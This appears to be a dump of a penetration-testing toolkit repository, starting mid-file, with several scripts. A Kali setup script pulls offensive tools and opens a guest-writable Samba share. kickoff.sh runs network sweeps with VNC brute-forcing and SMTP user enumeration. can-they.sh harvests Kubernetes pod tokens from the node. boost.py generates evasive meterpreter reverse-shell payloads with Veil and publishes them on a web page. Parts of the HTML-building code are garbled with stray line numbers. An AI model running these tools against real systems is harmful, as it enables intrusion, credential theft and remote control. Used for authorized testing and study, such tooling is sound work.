/root/tools 97 | git clone https://github.com/mattifestation/PowerSploit.git 98 | 99 | #PowerTools Setup 100 | cd /root/tools 101 | git clone https://github.com/Veil-Framework/PowerTools.git 102 | cp /root/tools/PowerTools/PowerUp/PowerUp.ps1 /var/www 103 | cp /root/tools/PowerTools/PowerView/powerview.ps1 /var/www 104 | 105 | #Pykek Setup 106 | cd /opt 107 | git clone 
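https://github.com/bidord/pykek.git

#payload autogeneration
#
cd /root/tools
git clone https://github.com/trustedsec/unicorn.git

cd ~/Desktop
wget http://www.rarlab.com/rar/wrar520.exe
wine wrar520.exe
rm wrar520.exe

#foofus OWA enum scripts
#
mkdir -p /opt/foofus
cd /opt/foofus
wget http://www.foofus.net/jmk/tools/owa/OWALogonBrute.pl
wget http://www.foofus.net/jmk/tools/owa/OWA55EnumUsersURL.pl
wget http://www.foofus.net/jmk/tools/owa/OWALightFindUsers.pl
wget http://www.foofus.net/jmk/tools/owa/OWAFindUsers.pl
wget http://www.foofus.net/jmk/tools/owa/OWAFindUsersOld.pl

#Praeda install
#
cd /root/tools
git clone https://github.com/percx/Praeda.git
git clone https://github.com/MooseDojo/praedasploit.git
cd praedasploit
mkdir -p /usr/share/metasploit-framework/modules/auxiliary/praedasploit
cp * /usr/share/metasploit-framework/modules/auxiliary/praedasploit
cpan -i LWP::Simple LWP::UserAgent HTML::TagParser URI::Fetch HTTP::Cookies IO::Socket HTML::TableExtract Getopt::Std Net::SSL Net::SNMP NetAddr::IP

#setup sambe
mkdir /srv/kali
chmod 777 /srv/kali
echo "[kali]" >> /etc/samba/smb.conf
echo " comment = Kali share" >> /etc/samba/smb.conf
echo " path = /srv/kali" >> /etc/samba/smb.conf
echo " browseable = yes" >> /etc/samba/smb.conf
echo " public = yes" >> /etc/samba/smb.conf
echo " writable = yes" >> /etc/samba/smb.conf
echo " guest ok = yes" >> /etc/samba/smb.conf

msfupdate

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

--------------------------------------------------------------------------------
/kickoff.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# kickoff.sh: discovery sweep, then targeted service scans and a few NSE
# checks, with progress written to kickofflog.log and report.txt.
#
# Usage: kickoff.sh /working/directory/
#
# The working directory is used as a plain string prefix (e.g.
# "${workdir}scope.txt"), so it must end with a trailing slash. It must already
# contain scope.txt and excludes.txt; everything else (ping-sweep,
# live-hosts.txt, ports.txt, the per-port nmap output and the Finals/
# directory) is written there.

display_usage(){
    clear
    echo "============================================================"
    echo "This script requires a 'working directory' to dump files to."
    echo ""
    echo "Usage: $0 /working/directory/"
    echo "============================================================"
}

if [ $# -le 0 ]
then
    display_usage
    exit 0
fi

# Capture the script argument once. Inside a function "$1" is the function's
# own first argument, so the original logit()/report() expanded
# "$1kickofflog.log" to a file named after the log message instead of the
# working directory.
workdir="$1"
finals="${workdir}Finals"

clear
echo "" > "${workdir}kickofflog.log"
echo "" > "${workdir}report.txt"

# logit MESSAGE: append a timestamped line to kickofflog.log in the working directory.
logit(){
    echo "$(date +'%Y-%m-%d-%T') $1" >> "${workdir}kickofflog.log"
}
# report MESSAGE: append a line to report.txt in the working directory.
report(){
    echo "$1" >> "${workdir}report.txt"
}

#Discovery Scan

echo -e "===================================="
echo -e "Beginning Discovery Scan"
echo -e "===================================="

report "Beginning Discovery Scan..."
logit "Start Discovery Scan"

# The original had a typographic dash in "—-stats-every", which nmap rejects.
nmap -sn -v10 -T4 -n --open -iL "${workdir}scope.txt" --excludefile "${workdir}excludes.txt" -oG "${workdir}ping-sweep" --stats-every 1m

report "Discovery scan has finished"
logit "Finished Discovery Scan"

#Create live host list (live-hosts.txt)
awk '/Up/{print $2}' "${workdir}ping-sweep" | sort -u > "${workdir}live-hosts.txt"
linecount=$(wc -l < "${workdir}live-hosts.txt")
report "There are $linecount hosts on the network."
read -p "Check that the exclusions were actually excluded and then press [Enter] to continue..."

#Builds a list of ports to scan in ports.txt. One entry per line; an entry may
#be an nmap port expression, which is why "5800,5900-5920" is a single line
#(it also becomes part of that scan's output file name).
#5985: Rob Fuller/Chris Gates Dirty little secrets part 2. Psexec-winrm MSF module
printf '%s\n' 445 21 23 25 53 389 686 1433 2049 3306 5800,5900-5920 5985 10000 80 > "${workdir}ports.txt"

#Service Scan loop. Loops through and scans the list of services created above.

echo -e "===================================="
echo -e "Beginning Targetted Service Scans"
echo -e "===================================="

while read -r port; do
    [ -z "$port" ] && continue
    report "Scanning port $port"
    logit "Start Scanning port $port"
    nmap -Pn -p"$port" -sV -sC --open -T4 -oA "${workdir}${port}" -v10 --stats-every 1m -iL "${workdir}live-hosts.txt"
    logit "Finished Scanning port $port"
    report "Finished Scanning port $port"
done < "${workdir}ports.txt"

mkdir -p "$finals"

#list Telnet IPs minus printers. The per-port output was written to the
#working directory (-oA above), so it is read from there, not from the cwd.
awk '!/telnet\?/ && !/print/ && !/printer/ && !/JetDirect/ && !/#/ && !/tcpwrapped/ && !/Ricoh/ && !/Up/ && !/APC/ && !/Pocket/' "${workdir}23.gnmap" | uniq > "$finals/TelnetList.gnmap"
report "Telnet list created"

#SMTP Relay Nmap Script.

echo -e "===================================="
echo -e "Beginning SMTP Open Relay"
echo -e "and Enumeration NSE scripts"
echo -e "===================================="

smtprelay="${workdir}smtprelay.txt"
awk '!/printer/ && !/JetDirect/ && !/#/ && !/tcpwrapped/ && !/Ricoh/ && !/Up/ && !/APC/ && !/Pocket/{print $2}' "${workdir}25.gnmap" | uniq > "$smtprelay"

report "Checking for open relays"
logit "Start Open Relay Scan"
nmap -Pn --script smtp-open-relay.nse -p 25,465,587 --open -iL "$smtprelay" -oA "$finals/SMTP_Relay"
report "Finished Open Relay Scan"
logit "Finished Open Relay Scan"

report "Checking for SMTP user enumeration"
logit "Start SMTP User Enumeration Scan"
nmap -Pn --script smtp-enum-users.nse -p 25,465,587 --open -iL "$smtprelay" -oA "$finals/SMTP_Enum"
report "Finished SMTP User Enumeration Scan"
logit "Finished SMTP User Enumeration Scan"

rm -f "$smtprelay"

#HTTP(s) Screenshots
#(not implemented)

#List IPs that have 445 open and save as windows hosts?
awk '!/#/{print $2}' "${workdir}445.gnmap" | sort -u > "${workdir}445.txt"

echo -e "===================================="
echo -e "Beginning NFSulator"
echo -e "===================================="

#Tim Gamble's NFS script
ipfile="${workdir}nfs.txt"
awk '!/#/{print $2}' "${workdir}2049.gnmap" | sort -u > "$ipfile"
tempfile="${workdir}temp.txt"
errorlog="${workdir}error.log"

### Delete Temp file
rm -f "$tempfile" 2>"$errorlog"
: > "$tempfile"

### Create /tmp mountpoint
if [ ! -d /tmp/nfsmount ]; then
    mkdir -p /tmp/nfsmount
fi

### Checking and Showing open NFS shares
#The original tested "-z $ipfile", which can never be true because ipfile is
#always assigned above; test for an empty host list instead.
if [ ! -s "$ipfile" ]; then
    echo "No hosts with 2049 open; skipping NFS share review."
else
    while read -r i; do
        showmount -e "$i" | grep "/" | awk -v host="$i" '{ print host ":" $1 }' >> "$tempfile"
    done < "$ipfile"
    while read -r z; do
        umount /tmp/nfsmount 2>>"$errorlog"
        echo "Mounting $z"
        echo "Mount Command: mount -t nfs -o nolock $z /tmp/nfsmount"
        mount -t nfs -o nolock "$z" /tmp/nfsmount 2>>"$errorlog"
        ls -lah /tmp/nfsmount 2>>"$errorlog"
        echo "Un-Mounting $z"
        umount /tmp/nfsmount 2>>"$errorlog"
        echo -e "\n"
    done < "$tempfile"
    echo -e "Unmount Command: umount /tmp/nfsmount\n"
fi

rm -f "$tempfile"

read -p "Review the NFS shares above and then press [Enter] to continue..."

#VNC Brute Force

echo -e "===================================="
echo -e "Beginning VNC-Brute"
echo -e "===================================="

awk '!/#/{print $2}' "${workdir}5800,5900-5920.gnmap" | sort -u > "$finals/vnc.txt"
report "Brute forcing VNC"
logit "Start VNC-Brute scan"
nmap -Pn --open --script vnc-brute -p 5900-5920,5800 -iL "$finals/vnc.txt" -oA "$finals/vnc"
logit "Finished VNC-Brute scan"

#Check MSSQL for empty passwords

echo -e "===================================="
echo -e "Beginning MSSQL "
echo -e "===================================="

awk '/Up/{print $2}' "${workdir}1433.gnmap" | sort -u > "${workdir}1433.txt"
nmap --script ms-sql-empty-password -iL "${workdir}1433.txt" -oA "$finals/mssql"

--------------------------------------------------------------------------------
/k8s/can-they/can-they.sh:
--------------------------------------------------------------------------------
#!/bin/bash
###############################################################################
# Purpose:
#
# This script will find the token/secret for each pod running on the node and
# tell you what each token is authorized to do. It can be run from within a pod
# that has the host's filesystem mounted to /host, or from outside the pod.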
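#
# Usage:
#
# *** For execution INSIDE a pod with the host's filesystem mounted to /host ***
#
# This mode is best for:
# - everything-allowed
# - hostPath
#
# Copy the can-they.sh helper script to the pod, download it from github, or manually create it
# kubectl cp scripts/can-they.sh podname:/
#
# Exec into pod (Don't chroot)
# kubectl exec -it pod-name -- bash
#
# Run can-they.sh
# ./can-they.sh "-i --list"
# ./can-they.sh "-i --list -n kube-system"
# ./can-they.sh "-i --list -n default"
# ./can-they.sh "-i list secrets -n kube-system"
# ./can-they.sh "-i create pods -n kube-system"
# ./can-they.sh "-i create clusterrolebindings"
#
#
# *** For execution OUTSIDE a pod ***
#
# This mode is best for:
# - priv-and-hostpid
#
# Run can-they.sh
# ./can-they.sh -n NAMESPACE -p POD_NAME -i "OPTIONS"
# ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "list secrets -n kube-system"
# ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "--list"
# ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "-n kube-system"
# ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "get secrets -n kube-system"
#
###############################################################################

# Abort early unless the current kubeconfig user can exec into pods in
# $namespace. "kubectl auth can-i" prints yes/no; anything other than "yes"
# (including an error, which leaves $check empty) is treated as no access.
function check-can-exec-pod {
    check=$(kubectl auth can-i create pods/exec -n "$namespace")
    if [[ "$check" != "yes" ]]; then
        echo "Are you sure you have access to exec into $pod in the $namespace namespace?"
        exit 1
    fi
}

# Prepare the per-token "kubectl auth can-i" calls made from outside the pod.
# KUBECONFIG is pointed at a non-existent file for those calls so that only the
# pod token is used to authenticate; that also discards the cluster CA, which
# is why the original passed --insecure-skip-tls-verify. The CA is taken from
# the current kubeconfig when present, and the insecure flag is only used as a
# fallback when there is no CA to verify against.
function setup-token-query {
    SERVER=$(kubectl config view --minify --flatten -o jsonpath='{.clusters[].cluster.server}')
    ca_data=$(kubectl config view --minify --flatten -o jsonpath='{.clusters[].cluster.certificate-authority-data}')
    if [[ -n "$ca_data" ]]; then
        ca_file=$(mktemp)
        trap 'rm -f "$ca_file"' EXIT
        echo "$ca_data" | base64 -d > "$ca_file"
        tls_args=(--certificate-authority="$ca_file")
    else
        tls_args=(--insecure-skip-tls-verify)
    fi
}

# query-token TOKEN: run "kubectl auth can-i $user_input" authenticating as TOKEN.
# $user_input is intentionally unquoted so "list secrets -n kube-system" is
# passed as separate arguments. Note the token is placed on the kubectl command
# line and is therefore visible in the process list while the call runs.
function query-token {
    KUBECONFIG="dummy" kubectl --server="$SERVER" "${tls_args[@]}" --token="$1" auth can-i $user_input 2>/dev/null
    echo
}

function run-outside-pod {
    # Get the filenames that contain tokens from the mounted host directory.
    # No "-t": a TTY would turn the newlines into CRLF.
    tokens=$(kubectl exec "$pod" -n "$namespace" -- find /host/var/lib/kubelet/pods/ -name token -type l 2>/dev/null)

    # Backup plan in case you are chrooted or running on host
    if [[ -z "$tokens" ]]; then
        tokens=$(kubectl exec "$pod" -n "$namespace" -- find /var/lib/kubelet/pods/ -name token -type l 2>/dev/null)
    fi

    # Server and CA are read once here. The original unset KUBECONFIG after
    # the first token, so later "kubectl config view" calls silently fell back
    # to the default kubeconfig.
    setup-token-query
    for filename in $tokens; do
        filename_clean=$(echo "$filename" | tr -dc '[[:print:]]')
        echo "--------------------------------------------------------"
        echo "Token Location: $filename_clean"
        tokena=$(kubectl exec "$pod" -n "$namespace" -- cat "$filename_clean")
        echo -n "Can I $user_input? "
        echo
        query-token "$tokena"
    done
}

# Refuse to run in "inside" mode when the in-cluster environment is missing.
function am-i-inside-pod-check {
    if [[ -z "$KUBERNETES_SERVICE_HOST" ]]; then
        echo "It does not appear you are in a Kubernetes pod?"
        echo
        usage
    fi
}

function run-inside-pod {
    if [ ! -f "/usr/local/bin/kubectl" ]; then
        apt update && apt -y install curl
        #Download and install kubectl into pod, verifying the published sha256
        #before trusting the binary.
        release=$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)
        base="https://storage.googleapis.com/kubernetes-release/release/${release}/bin/linux/amd64"
        curl -LO "${base}/kubectl"
        curl -LO "${base}/kubectl.sha256"
        if ! echo "$(cat kubectl.sha256)  kubectl" | sha256sum --check --status; then
            echo "kubectl download failed checksum verification; refusing to install it."
            rm -f ./kubectl ./kubectl.sha256
            exit 1
        fi
        rm -f ./kubectl.sha256
        chmod +x ./kubectl
        mv ./kubectl /usr/local/bin/kubectl
    fi

    # Get the filenames that contain tokens from the mounted host directory
    tokens=$(find /host/var/lib/kubelet/pods/ -name token -type l 2>/dev/null)
    # Backup plan in case you are chrooted or running on host
    if [[ -z "$tokens" ]]; then
        tokens=$(find /var/lib/kubelet/pods/ -name token -type l 2>/dev/null)
    fi
    #For each token, print the token location and run `kubectl auth can-i` using each token via the `--token` command line argument.
    for filename in $tokens; do
        filename_clean=$(echo "$filename" | tr -dc '[[:print:]]')
        echo "--------------------------------------------------------"
        echo "Token Location: $filename_clean"
        tokena=$(cat "$filename_clean")
        echo -n "Can I $user_input? "
        kubectl --token="$tokena" auth can-i $user_input
        echo
    done
}

function usage {
    echo "Usage: "
    echo
    echo " [From outside a pod]: $0 -p podname -n namespace [-i \"VERB [TYPE] [options]\"]"
    echo " [From inside a pod]: $0 [-i \"VERB [TYPE] [options]\"]"
    echo
    echo "Options: "
    echo
    printf " -p\tPod Name\n"
    printf " -n\tNamespace\n"
    printf " -i\tArguments that you would normally pass to kubectl auth can-i []\n"
    echo
    exit 1
}

while getopts "n:p:i:" flag
do
    case "${flag}" in
        n) namespace=${OPTARG};;
        p) pod=${OPTARG};;
        i) user_input=${OPTARG};;
        *) usage;;
    esac
done

if [[ -z "$user_input" ]]; then
    user_input="--list"
fi

if [[ "$namespace" ]] && [[ "$pod" ]]; then
    check-can-exec-pod
    run-outside-pod
elif [[ -z "$namespace" ]] && [[ -z "$pod" ]]; then
    am-i-inside-pod-check
    run-inside-pod
else
    echo "If running this script from outside a pod, you need to specify both the pod name and the namespace"
    usage
fi

--------------------------------------------------------------------------------
/multi_arachni.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#
# Written by Andrew Luke (@sw4mp_f0x) and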
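# Steve Borosh (@424f424f)
#
#

from Queue import Queue, Empty
from threading import Thread
import subprocess
from optparse import OptionParser
import os
import glob
import datetime
from time import sleep

# Arachni install directory. Every scanner/reporter call runs with this as its
# cwd; the original hard-coded the path in several places and relied on the
# cwd being this directory for its relative "output/..." paths.
ARACHNI_DIR = '/opt/arachni-1.4-0.5.10/bin'
RED = '\x1b[1;31;40m'
RESET = '\x1b[0m'


def _run(cmd):
    """Run *cmd* (an argv list, never a shell string) in ARACHNI_DIR; return its stdout.

    Targets and the project name come straight from user input. Passing them as
    argv elements instead of interpolating them into a shell=True string keeps
    characters such as ';' or '$(' from being interpreted by a shell.
    """
    task = subprocess.Popen(cmd, cwd=ARACHNI_DIR, stdout=subprocess.PIPE)
    # communicate() waits for the process to finish before returning.
    return task.communicate()[0]


def _target_file(target):
    """Return the report base name for *target*: its host part, plus '[s]' for https."""
    host = target.split('/')[2]
    if target.split('//')[0].lower() == 'https:':
        return host + '[s]'
    return host


def worker(workerid):
    """Pull targets from the global queue and scan each one with Arachni.

    For every target this runs the scan, then builds the txt and html reports
    from the saved .afr file. Reads the module globals q, timeout and
    projectname that main() sets up. Returns when the queue is empty.
    """
    while True:
        try:
            # Non-blocking get: several workers can see a non-empty queue at the
            # same time, and the original's blocking get() hung the loser forever.
            target = q.get(block=False)
        except Empty:
            break

        try:
            target_file = _target_file(target)
            print(RED + workerid + ": scanning {}...".format(target) + RESET)

            afr = os.path.join(ARACHNI_DIR, 'output', projectname, target_file + '.afr')
            # Run Arachni against target
            print(_run(['./arachni', target, '--timeout', timeout,
                        '--report-save-path=' + afr]))

            # Generate HTML and TXT reports from results
            print(RED + workerid + ': Building reports for ' + target_file + RESET)
            print(_run(['./arachni_reporter', afr,
                        '--reporter=txt:outfile=complete/{}/{}.txt'.format(projectname, target_file)]))
            print(_run(['./arachni_reporter', afr,
                        '--reporter=html:outfile=complete/{}/{}.html.zip'.format(projectname, target_file)]))
            print(RED + workerid + ': ' + target_file + ' Complete!' + RESET)
        except Exception as e:
            # Report and move on to the next target instead of killing the worker.
            print(RED + workerid + ': ' + target + ' failed: ' + str(e) + RESET)
        finally:
            # Always mark the item done; the original skipped this on error, so
            # q.join() in main() never returned.
            q.task_done()
    print(RED + workerid + ': No more targets. Exiting.' + RESET)


def main():
    """Parse arguments, build the target queue, run the workers and merge the reports."""
    # Argument parsing
    usage = "usage: %prog -p ProjectName -f PathToFile [-t Timeout]"
    parser = OptionParser(usage=usage)
    parser.add_option('-p', '--project', action="store", help='Name used to identify the project', dest='projectname')
    parser.add_option('-f', '--file', action="store", help='File with list of URLs', dest='filename')
    parser.add_option('-t', '--timeout', action="store", help="Scan Timeout HOURS:MINUTES:SECONDS", dest='timeout', default='01:00:00')
    (options, args) = parser.parse_args()

    # Checking for required arguments
    if not options.projectname or not options.filename:
        parser.error("The project name and file name must be defined.")
    # The project name becomes a path component under output/ and complete/.
    if os.path.sep in options.projectname or options.projectname in ('.', '..'):
        parser.error("The project name must be a plain directory name.")

    # Setting script variables. The workers read these as module globals.
    global timeout, projectname, q
    timeout = options.timeout
    projectname = options.projectname
    q = Queue()
    num_worker_threads = 4
    totaltargets = 0
    starttime = datetime.datetime.now()

    # Create project folders
    output_dir = os.path.join(ARACHNI_DIR, 'output', projectname)
    complete_dir = os.path.join(ARACHNI_DIR, 'complete', projectname)
    for directory in (output_dir, complete_dir):
        if not os.path.exists(directory):
            os.makedirs(directory)

    # Parse provided target file into Queue, skipping blank lines.
    print(RED + 'Building Target Queue...' + RESET)
    with open(options.filename) as f:
        for url in f:
            target = url.strip()
            if not target:
                continue
            q.put(target)
            totaltargets += 1
            print('URL Added.')

    # Create and label workers
    print(RED + 'Creating Workers...' + RESET)
    for i in range(num_worker_threads):
        workerid = 'Worker-' + str(i + 1)
        t = Thread(target=worker, name=workerid, args=(workerid,))
        t.daemon = True
        t.start()
        print(workerid + ' Created.')

    # Until the Queue is empty, print a status update every 3 minutes
    sleep(10)
    while not q.empty():
        elapsedtime = datetime.datetime.now() - starttime
        print(RED + '=============Scan Status=============' + RESET)
        print(RED + 'Total targets: ' + str(totaltargets) + RESET)
        print(RED + 'Remaining targets: ' + str(q.qsize()) + RESET)
        print(RED + 'Time: ' + str(elapsedtime) + RESET)
        sleep(180)

    q.join()
    totaltime = datetime.datetime.now() - starttime

    # Merge afr files and generate merged report. glob() replaces the shell
    # wildcard the original needed shell=True for; MERGED.afr itself is
    # excluded so that a re-run does not feed the previous merge back in.
    print(RED + 'Building final, merged report...' + RESET)
    merged = os.path.join(output_dir, 'MERGED.afr')
    afr_files = sorted(p for p in glob.glob(os.path.join(output_dir, '*')) if p != merged)
    if afr_files:
        print(_run(['./arachni_script', 'merge.rb'] + afr_files + [merged]))
        print(_run(['./arachni_reporter', merged,
                    '--reporter=html:outfile=complete/{}/MERGED_REPORT.html.zip'.format(projectname)]))
    else:
        print(RED + 'No .afr files found; skipping merged report.' + RESET)

    # Completion notice
    print(RED + 'Report Complete.' + RESET)
    print(RED + '=============Scans Complete=============' + RESET)
    print(RED + 'Total targets: ' + str(totaltargets) + RESET)
    print(RED + 'Time: ' + str(totaltime) + RESET)


if __name__ == "__main__":
    main()

--------------------------------------------------------------------------------
/Roll For Initiative/boost.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

import os
import sys
import socket
import fcntl
import struct
import argparse
import datetime
import re

# Check for Veil installation and import it if present. Nothing below works
# without it, so both failure paths exit non-zero (the original exited 0 on a
# broken configuration and carried on when Veil was absent).
if os.path.isfile('/etc/veil/settings.py'):
    try:
        sys.path.append("/etc/veil/")
        import settings as VeilSettings
        sys.path.append(VeilSettings.VEIL_EVASION_PATH)

        # import controller module
        from modules.common import controller as VeilController

    except Exception:
        print("Somthing went wrong with the veil configuration.")
        sys.exit(1)
else:
    print("Veil is not installed, or the configuration file does not exist.")
    print("Please ensure that the configuration file /etc/veil/settings.py has been created.")
    sys.exit(1)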
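
# Build namespaces to pass args to Veil functions
class Namespace:
    """Attribute bag built from keyword arguments.

    Veil's controller expects an argparse-style namespace (``args.o``,
    ``args.pwnstaller``, ``args.overwrite``); this stands in for one.
    """
    def __init__(self, **kwargs):
        self.__dict__.update(kwargs)


def isIPValid(address):  # WORKING Citation: Maria Zverina http://stackoverflow.com/a/11264379
    """Return True if *address* is a dotted-quad IPv4 string, else False.

    Accepts exactly four dot-separated decimal fields, each 0-255. Anything
    that is not a string of that shape (including None) yields False.
    """
    try:
        host_bytes = address.split('.')
        values = [int(b) for b in host_bytes]
    except (ValueError, AttributeError):
        return False
    in_range = [b for b in values if 0 <= b <= 255]
    return len(host_bytes) == 4 and len(in_range) == 4


def findIP(interface):  # WORKING
    """Return the IPv4 address assigned to *interface* (e.g. 'eth0').

    Uses the SIOCGIFADDR ioctl on a throwaway datagram socket. Exits the
    program with status 1 if the address cannot be read (no address assigned,
    unknown interface).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # 0x8915 is SIOCGIFADDR; the request buffer is 256 bytes and the
        # address is taken from bytes 20-24 of the result.
        packed = fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', interface[:15]))
        return socket.inet_ntoa(packed[20:24])
    except (IOError, OSError, TypeError):
        print("ERROR: No IP Address Assigned.\n\n Make sure " + str(interface) + " has an IP configured.")
        sys.exit(1)
    finally:
        s.close()


def BuildVeilTCP(LHOST, LPORT, outputbasename, lang, pwnstaller=True, overwrite=True, **kwargs):  # IMPLEMENT
    """Build Veil's meterpreter rev_tcp output for *lang* and return it.

    LHOST/LPORT are the handler address and port; outputbasename receives a
    per-language suffix. pwnstaller/overwrite are passed through to Veil's
    output step. kwargs are accepted but unused. Returns the output file path,
    except for powershell where the generated file's contents are returned;
    returns None for an unknown *lang*.
    """

    # Instantiate the controller
    controller = VeilController.Controller(oneRun=True)

    # Build the options dictionaries.
    options = {}
    options['required_options'] = {}

    # Set the options per language.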
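# BuildVeilTCP (continued): per-language required options and output name.
    lang_key = lang.lower()
    if lang_key == 'python':
        print("Using python")
        options['required_options']['ARCHITECTURE'] = ['32', ""]
        options['required_options']['COMPILE_TO_EXE'] = ['Y', ""]
        options['required_options']['EXPIRE_PAYLOAD'] = ['X', ""]
        options['required_options']['LHOST'] = [LHOST, ""]
        options['required_options']['LPORT'] = [LPORT, ""]
        options['required_options']['USE_PYHERION'] = ['Y', ""]
        args = Namespace(o=outputbasename + "p", pwnstaller=pwnstaller, overwrite=overwrite)
        controller.SetPayload('python/meterpreter/rev_tcp', options)
    elif lang_key == 'ruby':
        print("Using Ruby")
        options['required_options']['LHOST'] = [LHOST, ""]
        options['required_options']['LPORT'] = [LPORT, ""]
        args = Namespace(o=outputbasename + "r", pwnstaller=False, overwrite=overwrite)
        controller.SetPayload('ruby/meterpreter/rev_tcp', options)
    elif lang_key == 'powershell':
        print("Using powershell")
        options['required_options']['LHOST'] = [LHOST, ""]
        options['required_options']['LPORT'] = [LPORT, ""]
        # NOTE(review): python and powershell both use the "p" suffix; confirm
        # the two outputs differ in extension so neither overwrites the other.
        args = Namespace(o=outputbasename + "p", pwnstaller=False, overwrite=overwrite)
        controller.SetPayload('powershell/meterpreter/rev_tcp', options)
        # Continue to add more languages here.
    else:
        print("BuildVeilTCP: Error - Invalid lang setting.")
        # The original fell through to GeneratePayload() with no payload set and
        # no `args` bound (NameError); bail out the way BuildVeilHTTPS does.
        return None

    # Generate the payload
    payloadcode = controller.GeneratePayload()

    # Gotta change into the Veil-Evasion directory. Save current working dir,
    # change, then change back (also on error, so the caller's cwd survives).
    workingdirectory = os.getcwd()
    os.chdir(VeilSettings.VEIL_EVASION_PATH)
    try:
        outFile = controller.OutputMenu(controller.payload, payloadcode, showTitle=False, interactive=False, args=args)
    finally:
        # Changing back
        os.chdir(workingdirectory)
    if lang_key == 'powershell':
        with open(outFile, 'r') as f:
            fr = f.read()
        print(fr + "\n")
        return fr  # outFile
    return outFile


def BuildVeilHTTPS(LHOST, LPORT, outputbasename, lang, pwnstaller=True, overwrite=True, **kwargs):  # IMPLEMENT
    """Build Veil's meterpreter rev_https output for *lang* and return it.

    Same contract as BuildVeilTCP: LHOST/LPORT are the handler address and
    port, outputbasename gets a per-language suffix, pwnstaller/overwrite go
    to Veil's output step and kwargs are unused. Returns the output file path
    (the file's contents for powershell), or None for an unknown *lang*.
    """

    # Instantiate the controller
    controller = VeilController.Controller(oneRun=True)

    # Build the options dictionaries.
    options = {}
    options['required_options'] = {}

    # Set the options per language.
    lang_key = lang.lower()
    if lang_key == 'python':
        print("Using python")
        options['required_options']['ARCHITECTURE'] = ['32', ""]
        options['required_options']['COMPILE_TO_EXE'] = ['Y', ""]
        options['required_options']['EXPIRE_PAYLOAD'] = ['X', ""]
        options['required_options']['LHOST'] = [LHOST, ""]
        options['required_options']['LPORT'] = [LPORT, ""]
        options['required_options']['USE_PYHERION'] = ['Y', ""]
        args = Namespace(o=outputbasename + "p", pwnstaller=pwnstaller, overwrite=overwrite)
        controller.SetPayload('python/meterpreter/rev_https', options)
    elif lang_key == 'ruby':
        print("Using Ruby")
        options['required_options']['LHOST'] = [LHOST, ""]
        options['required_options']['LPORT'] = [LPORT, ""]
        # NOTE(review): BuildVeilTCP hard-codes pwnstaller=False for ruby while
        # this passes the caller's value through; confirm which is intended.
        args = Namespace(o=outputbasename + "r", pwnstaller=pwnstaller, overwrite=overwrite)
        controller.SetPayload('ruby/meterpreter/rev_https', options)
    elif lang_key == 'powershell':
        print("Using powershell")
        options['required_options']['LHOST'] = [LHOST, ""]
        options['required_options']['LPORT'] = [LPORT, ""]
        args = Namespace(o=outputbasename + "p", pwnstaller=False, overwrite=overwrite)
        controller.SetPayload('powershell/meterpreter/rev_https', options)
        # Continue to add more languages here.
    else:
        print("BuildVeilHTTPS: Error - Invalid lang setting.")
        return None

    # Generate the payload
    payloadcode = controller.GeneratePayload()

    # Gotta change into the Veil-Evasion directory. Save current working dir,
    # change, then change back (also on error).
    workingdirectory = os.getcwd()
    os.chdir(VeilSettings.VEIL_EVASION_PATH)
    try:
        outFile = controller.OutputMenu(controller.payload, payloadcode, showTitle=False, interactive=False, args=args)
    finally:
        # Changing back
        os.chdir(workingdirectory)
    if lang_key == 'powershell':
        with open(outFile, 'r') as f:
            fr = f.read()
        print(fr + "\n")
        return fr  # outFile

    return outFile


def BuildHTTPPage(LHOST, LPORT):  # Building
    """Build the HTML index page listing the generated outputs for LHOST:LPORT."""
    # Build exploit function: one page section with a title, an id and its body text.
    def exploit(title, id, d):
        r = '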

\n' 182 | r += '

' + title + '

\n' 183 | r += '
\n' 184 | r += '
' 185 | r += d + "\n" 186 | r += '
\n' 187 | r += '\n' 188 | r += '\n' 189 | r += '
\n' 190 | return r 191 | 192 | # Set outbase name for payloads based on current days date. 193 | today = datetime.date.today() 194 | outputbase = str(today.strftime('%Y%m%d')) 195 | 196 | # Build payloads 197 | tcp_ps = BuildVeilTCP(LHOST, LPORT, outputbase + 'tcp', lang='powershell', pwnstaller=True, overwrite=True) 198 | tcp_python = BuildVeilTCP(LHOST, LPORT, outputbase + 'tcp', lang='python', pwnstaller=True, overwrite=True) 199 | tcp_ruby = BuildVeilTCP(LHOST, LPORT, outputbase + 'tcp', lang='ruby', pwnstaller=True, overwrite=True) 200 | https_ps = BuildVeilHTTPS(LHOST, LPORT, outputbase + 'https', lang='powershell', pwnstaller=True, overwrite=True) 201 | https_python = BuildVeilHTTPS(LHOST, LPORT, outputbase + 'https', lang='python', pwnstaller=True, overwrite=True) 202 | https_ruby = BuildVeilHTTPS(LHOST, LPORT, outputbase + 'https', lang='ruby', pwnstaller=True, overwrite=True) 203 | 204 | 205 | # Build HTTP Header 206 | http = '\n' 207 | http += '\n' 208 | http += '\n' 209 | http += '\tPROJECT BOOST\n' 210 | http += '\t\n' 211 | http += '\t\n' 212 | http += '\t\n' 213 | http += '\t\n' 214 | http += '\n' 215 | http += '\n' 235 | 236 | # Build HTTP Body 237 | http += '\n' 238 | http += 'IP Address: ' + str(LHOST) + '
\n' 239 | http += 'Port: ' + str(LPORT) + '
\n' 240 | 241 | http += exploit('Veil Powershell TCP', 'VeilPSTCP', tcp_ps) 242 | http += exploit('Veil Python TCP', 'VeilPYTCP', tcp_python) 243 | http += exploit('Veil Ruby TCP', 'VeilRubyTCP', tcp_ruby) 244 | http += exploit('Veil Powershell HTTPS', 'VeilPSHTTPS', https_ps) 245 | http += exploit('Veil Python HTTPS', 'VeilPYHTTPS', https_python) 246 | http += exploit('Veil Ruby HTTPS', 'VeilRubyHTTPS', https_ruby) 247 | 248 | # Finish the file. 249 | http += '
This file generated at : ' 250 | http += str(datetime.datetime.now()) 251 | http += '
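\n'
    http += '\n'
    http += '\n'

    return http


def main():
    """Build the index page and write it to the web root.

    Required flags: -i/--interface (the handler's interface; its IPv4 address
    becomes LHOST) and -p/--port (the handler's port). Exits with status 1 when
    either is missing. -o/--output overrides the destination file.
    """
    # Argument Parser. The original wrapped this in a bare "except:", which also
    # swallowed the SystemExit argparse raises for --help and reported it as
    # "Check flags".
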